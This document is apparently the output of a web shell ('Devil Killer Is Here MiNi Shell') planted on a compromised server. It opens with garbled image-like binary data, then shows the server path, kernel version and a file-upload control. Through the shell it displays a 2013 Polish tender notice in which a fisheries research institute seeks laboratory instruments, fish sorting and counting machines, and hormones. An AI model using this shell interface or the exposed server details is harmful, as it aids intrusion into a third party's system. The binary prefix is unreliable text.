JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130121/29108-N-2013.html

<p class="kh_header"><b>Olsztyn-Kortowo: Dostawa aparatury badawczej, sprzętu laboratoryjnego i odczynników specjalistycznych w ramach projektu pt. Opracowanie alternatywnych metod zarządzania rybołówstwem drapieżnych ryb jeziorowych polegających na zastosowaniu materiału zarybieniowego pochodzącego z intensywnego chowu w obiegach recyrkulacyjnych realizowanego w ramach Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013, (Umowa nr 00004-61724-OR1400001_09_11).</b><br>
<b>Numer ogłoszenia: 29108 - 2013; data zamieszczenia: 21.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Rybactwa Śródlądowego im. Stanisława Sakowicza , ul. Oczapowskiego 10, 10-719 Olsztyn-Kortowo, woj. warmińsko-mazurskie, tel. 089 5240171 w. 60; 5241060, faks 089 5240505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.infish.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa aparatury badawczej, sprzętu laboratoryjnego i odczynników specjalistycznych w ramach projektu pt. Opracowanie alternatywnych metod zarządzania rybołówstwem drapieżnych ryb jeziorowych polegających na zastosowaniu materiału zarybieniowego pochodzącego z intensywnego chowu w obiegach recyrkulacyjnych realizowanego w ramach Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013, (Umowa nr 00004-61724-OR1400001_09_11)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa aparatury badawczej, sprzętu laboratoryjnego i odczynników specjalistycznych w ramach projektu pt. Opracowanie alternatywnych metod zarządzania rybołówstwem drapieżnych ryb jeziorowych polegających na zastosowaniu materiału zarybieniowego pochodzącego z intensywnego chowu w obiegach recyrkulacyjnych realizowanego w ramach Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013, (Umowa nr 00004-61724-OR1400001_09_11). Zamówienie zostało podzielone na 10 części.
Część nr 1: Multiparametryczny miernik do badania jakości wody z równoczesnym pomiarem - 1 sztuka. Część nr 2: Ręczny homogenizator laboratoryjny z zestawem rotorów - 1 sztuka. Część nr 3: Oksymetr stacjonarny - laboratoryjny wraz z kablem i sondą - 1 sztuka. Część nr 4: Oksymetr z wyposażeniem - miernik wieloparametrowy (tzw. tlenomierz ręczny z możliwością pomiaru pH) z wyposażeniem - 1 sztuka. Część nr 5: Wagi - 2 sztuki. Część nr 6: Automatyczna sortownica do narybku - 1 sztuka. Część nr 7: Licznik narybku - 1 sztuka.
Część nr 8: Licznik wylęgu - 1 sztuka. Część nr 9: Odczynniki specjalistyczne - powietrze syntetyczne o czystości 5.0 - 4 butle po 50 litrów Część nr 10: Odczynniki specjalistyczne - hormony do rozrodu - Chorulon (hCG) - 90 000 fiolek po 1500-5000 IU hCG. Zamawiający dopuszcza składanie ofert częściowych. Szczegółowe określenie przedmiotu zamówienia zawarte jest w dokumencie
Opis przedmiotu zamówienia - formularz cenowy, który jest załącznikiem nr 2 do SIWZ. Dostarczony przedmiot zamówienia musi być fabrycznie nowy tj. wytworzony (wyprodukowany) jako środek trwały jak i jego części, które przed nabyciem nie były w jakiejkolwiek formie używane. Wszystkie wyspecyfikowane parametry
podane przez Zamawiającego w Załączniku nr 2 do niniejszej SIWZ, należy traktować jako wskazanie wymaganego poziomu technicznego i eksploatacyjnego przedmiotu zamówienia. W przypadku wskazania w opisie przedmiotu zamówienia nazw własnych, patentów, pochodzenia lub wskazania parametrów technicznych wskazujących na produkt konkretnego producenta, Zamawiający zgodnie z treścią art. 29 ust. 3 Ustawy Prawo zamówień publicznych dopuszcza możliwość składania ofert równoważnych o parametrach równych bądź lepszych do wyspecyfikowanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.43.68.00-8, 38.41.00.00-2, 38.31.11.00-9, 16.61.20.00-8, 38.55.00.00-5, 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom technicznym i jakościowym określonym szczegółowo w SIWZ, Zamawiający wymaga dołączenia do oferty folderów w języku polskim zawierające opis oferowanych przedmiotów oraz ich parametry techniczne, które będą potwierdzeniem, że oferowane przedmioty odpowiadają wymaganiom zawartym w Załączniku nr 2 do SIWZ. Dokumenty należy oznaczyć w taki sposób, aby jasno wynikało, jakiej części dotyczą. Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Sporządzony przez Wykonawcę, według wzoru stanowiącego Załącznik nr 1 do SIWZ, Formularz ofertowy. Sporządzony przez Wykonawcę, według wzoru stanowiącego Załącznik nr 2 do SIWZ, Formularz zestawienie parametrów technicznych stanowiący jednocześnie formularz cenowy. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego - w oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem pieczęcią Wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu rejestrowego oraz jej podpisem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zamawiający przewiduje w ramach zawartej umowy zmiany dotyczące: zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności nie dających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej, tj. zdarzenie, którego wystąpienie jest niezależne od Stron i
któremu nie mogą one zapobiec przy zachowaniu należytej staranności, a w szczególności: wojny, stany nadzwyczajne, klęski żywiołowe, epidemie, ograniczenia związane z kwarantanną, embargo, rewolucje, zamieszki i strajki; zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności. W przypadku zaistnienia którejś z wymienionych okoliczności, strony ustalają nowy termin realizacji przedmiotu umowy, który będzie stanowił zapis w aneksie do umowy. Wszelkie zmiany zapisów umowy winny być dokonywane w formie pisemnej (aneksu do umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.infish.com.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Rybactwa Śródlądowego im. Stanisława Sakowicza, ul. Michała Oczapowskiego 10, 10-719 Olsztyn (sekretariat na I piętrze pokój 106).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2013 godzina 10:00, miejsce: Instytut Rybactwa Śródlądowego im. Stanisława Sakowicza, ul. Michała Oczapowskiego 10, 10-719 Olsztyn (sekretariat na I piętrze pokój 106).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Opracowanie alternatywnych metod zarządzania rybołówstwem drapieżnych ryb jeziorowych polegających na zastosowaniu materiału zarybieniowego pochodzącego z intensywnego chowu w obiegach recyrkulacyjnych realizowanego w ramach Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013. Realizowany z pomocy finansowej pochodzącej  z  publicznych środków krajowych oraz Europejskiego Funduszu Rybackiego (Nr umowy 00004-61724-OR1400001_09_11)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Multiparametryczny miernik do badania jakości wody z równoczesnym pomiarem - 1 sztuka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Multiparametryczny miernik do badania jakości wody z równoczesnym pomiarem - 1 sztuka.
Parametry pomiarowe:
a) temperatury wody; zakres: od -5oC  do +40oC, rozdzielczość 0,01oC, dokładność min. ?0,2oC;
b) zawartości tlenu: zakres od 0,0 do 30,0 mg O2 mg na litr, rozdzielczość 0,01 mg O2 na litr, dokładność min. ?0,1 mg O2 na litr;
c) przewodnictwa: zakres od 0 do 2000 mikroS na cm, rozdzielczość 1 mikroS na cm, dokładność min. ?1 ?S/cm;
d) TDS: zakres od 0 do 300000 mg na litr, rozdzielczość 1 mg na litr, dokładność ?1 mg na litr;
e) pH: zakres od 0,00 do 14,00, rozdzielczość 0,01 pH, dokładność min ?0,02 pH;
f) ORP:  zakres od ?2000 mV, rozdzielczość 0,1 mV, dokładność min. ?1.0 mV;
Wyposażenie/funkcje:
a) funkcja automatycznej kompensacji temperatury (w zakresie pomiaru);
b) zatapialna sonda wyposażoną w trwałą, nieodkształcalną obudowę i samonośny kabel umożliwiający pomiary w profilu pionowym do głębokości min. 60 metrów;
c) wodoszczelny miernik (min. IP 67);
d) podświetlany wyświetlacz;
e) port USB wraz z odpowiednim kablem umożliwiającym podłączenie do komputera PC oraz odpowiednie sterowniki i oprogramowanie kompatybilne z systemem Windows ;
f) pamięć wewnętrzną umożliwiającą zapamiętanie wyników pomiarów (min. 10000 rekordów);
g) roztwory kalibracyjne;
h) wymienne membrany (jeśli potrzebne);
i) zasilanie: baterie alkaliczne 1.5V lub odpowiednie akumulatorki 1.2V - czas pracy na bateriach lub akumulatorach min. 50 h (bez podświetlenia);
j) możliwość podłączenia do zewnętrznego źródła prądu za pomocą ładowarki i lub kabla zasilającego; źródłem prądu może być port USB komputera, gniazdo zapalniczki samochodowej (prąd stały) lub sieć 230V (prąd zmienny);
k) walizka transportowa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.41.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ręczny homogenizator laboratoryjny z zestawem rotorów - 1 sztuka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ręczny homogenizator laboratoryjny z zestawem rotorów - 1 sztuka.
a) regulowana prędkość obrotów w zakresie do 25000 obr na minutę;
b) w zestawie minimum 3 urządzenia dyspersyjne o średnicy rotorów od 5 do 12 mm;
c) rotory wykonane ze stali szlachetnej;
d) zakres roboczy od 1 do 100 ml objętości próbki;
e) możliwość pracy bezprzewodowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.43.68.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Oksymetr stacjonarny - laboratoryjny wraz z kablem i sondą - 1 sztuka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oksymetr stacjonarny - laboratoryjny wraz z kablem i sondą - 1 sztuka.
a) pomiar tlenu rozpuszczonego (pomiary w mg/L i %),
zasolenia, ciśnienia atmosferycznego, temperatury; b)wyświetlacz LCD; c) barometr; d) zasilanie: sieć 230V oraz akumulatorki (baterie); e) rodzaj sondy: z mieszadełkiem. Parametry pomiarowe: tlen rozpuszczony [%] zakres 0 do 600% dokładność ?0,1% rozdzielczość 0,1%; tlen rozpuszczony [mg_l] zakres 0 do 60 mg_l dokładność ?0,1% rozdzielczość 0,01 mg_l; temperatura [0C] zakres -5 do +50 0C dokładność ?0,1 0C rozdzielczość 0,01 0C; barometr [mm Hg] zakres 450 do 825 mm Hg dokładność ?1% rozdzielczość 1 mm Hg; zasolenie [ppt] zakres 0 do 40 ppt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.41.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Oksymetr z wyposażeniem - miernik wieloparametrowy (tzw. tlenomierz ręczny z możliwością pomiaru pH) z wyposażeniem - 1 sztuka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oksymetr z wyposażeniem - miernik wieloparametrowy (tzw. tlenomierz ręczny z możliwością pomiaru pH) z wyposażeniem - 1 sztuka.
a) pomiar tlenu rozpuszczonego (pomiary w mg_l i %), zasolenia, ciśnienia atmosferycznego, temperatury, pH; b) wyświetlacz LCD; c) wskaźnik poziomu zużycia baterii; d) barometr; e) zgodność z IP 67; f) zasilanie: akumulatorki (baterie); g) długość kabla: min. 1 metr; h) rodzaj sondy: galwaniczna; i)
parametry pomiarowe: tlen rozpuszczony [%] zakres 0 do 500% dokładność ?2% rozdzielczość 0,1%; tlen rozpuszczony [mg_l] zakres 0 do 50 mg_l dokładność ?2% rozdzielczość 0,1%; temperatura [0C] zakres -5 do 70 0C; dokładność ?0,2 0C rozdzielczość 0,1 0C; barometr [mm Hg] zakres 375 do 825 mm Hg dokładność ?3 mm Hg w ?15 od punktu kalibracji rozdzielczość 0,1 mm Hg; zasolenie [ppt] zakres 0
do 70 ppt; pH zakres 0 do 14 pH dokładność ?0,2 pH rozdzielczość 0,01 pH..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.41.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wagi - 2 sztuki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wagi - 2 sztuki.
Waga nr 1: a) zakres ważenia do co najmniej 2 kg; b) dokładność ważenia mniejsza równa od 0,1g; c) tarowanie w całym zakresie ważenia; d) automatyczna kalibracja wewnętrzna; e) waga powinna być odporna na wodę i detergenty; f) wielkość platformy nie mniejsza niż 250 x 250 mm; g) waga powinna być wykonana ze
stali nierdzewnej; h) wyświetlacz powinien być na kolumnie; i) powinna posiadać oprogramowanie i przyłącza umożliwiające podłączenie do komputera. Waga nr 2: a) zakres ważenia do co najmniej 500 g; b) dokładność ważenia mniejsza równa od 0,01g; c) tarowanie w całym zakresie ważenia; d) automatyczna kalibracja wewnętrzna; e) waga powinna być odporna na wodę i detergenty; f) wielkość
platformy nie mniejsza niż 180 x 180 mm; g) waga powinna być wykonana ze stali nierdzewnej; h) wyświetlacz powinien być na kolumnie; i) zasilanie 230 V i akumulatorowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.31.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Automatyczna sortownica do narybku - 1 sztuka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Automatyczna sortownica do narybku - 1 sztuka.
a) wielkość sortowanych ryb od 0,5 do 30 g; b) zasilanie 230 V, jednofazowe; c)
tempo sortowania powyżej 100 kg na godz.; d) wymiary: długość i szerokość poniżej 200 cm; e) podczas sortowania ryby powinny znajdować się cały czas w wodzie; f) powinna mieć regulację prędkości sortowania; g) powinna mieć możliwość łatwego przemieszczania i być wyposażona w koła; h) powinna umożliwiać pracę na różnych wysokościach - mieć możliwość regulowania wysokości; i) powinna być
wykonana ze stali nierdzewnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 16.61.20.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Licznik narybku - 1 sztuka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Licznik narybku - 1 sztuka.
a) wielkość liczonych ryb powyżej 0,1 g; b) dokładność liczenia powyżej 97%; c) zasilanie 230 V; d) wymiary: największy wymiar poniżej 200 cm; e) odczyt i sterowanie na ekranie dotykowym; f) wyjścia na urządzenia zewnętrzne (mysz, klawiatura); g) możliwość stosowania do narybku szczupaka i sandacza; h) podczas liczenia ryby powinny znajdować się cały czas w wodzie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.55.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Licznik wylęgu - 1 sztuka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Licznik wylęgu - 1 sztuka.
a) wydajność liczenia - min. 1 mln szt. w ciągu godziny; b) dokładność liczenia - powyżej 97%; c) zastosowanie - wylęg ryb drapieżnych (sandacz, sum, szczupak); d) zasilanie: 220-230 V, prąd zmienny; e) masa urządzenia - poniżej 10 kg; f) wielkość komory liczącej 5-6 litrów; g) wyświetlacz cyfrowy z możliwością ręcznego zerowania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.55.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
